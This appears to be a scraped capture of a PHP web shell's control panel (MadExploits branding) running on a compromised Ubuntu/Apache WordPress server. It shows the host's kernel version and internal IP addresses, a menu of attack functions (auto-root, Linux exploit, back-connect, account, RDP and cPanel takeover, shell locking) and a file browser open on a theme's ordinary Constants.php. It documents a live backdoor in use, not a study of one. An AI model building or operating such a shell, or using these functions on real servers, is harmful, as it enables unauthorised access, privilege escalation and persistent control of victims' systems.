Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
themes /
raft /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
patterns
[ DIR ]
drwxr-xr-x
Admin.php
11.74
KB
-rw-r--r--
Assets_Manager.php
2.49
KB
-rw-r--r--
Block_Patterns.php
4.05
KB
-rw-r--r--
Block_Styles.php
815
B
-rw-r--r--
Constants.php
350
B
-rw-r--r--
Core.php
8.67
KB
-rw-r--r--
Starter_Content.php
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Constants.php
<?php /** * Constants class. * * @author Themeisle * @package raft * @since 1.0.0 */ namespace Raft; /** * Class Constants * * @package raft */ class Constants { const CACHE_KEYS = array( 'dismissed-welcome-notice' => 'raft-welcome-notice-dismissed', 'dismissed-fse-design-pack-notice' => 'raft-design-pack-dismissed', ); }
Close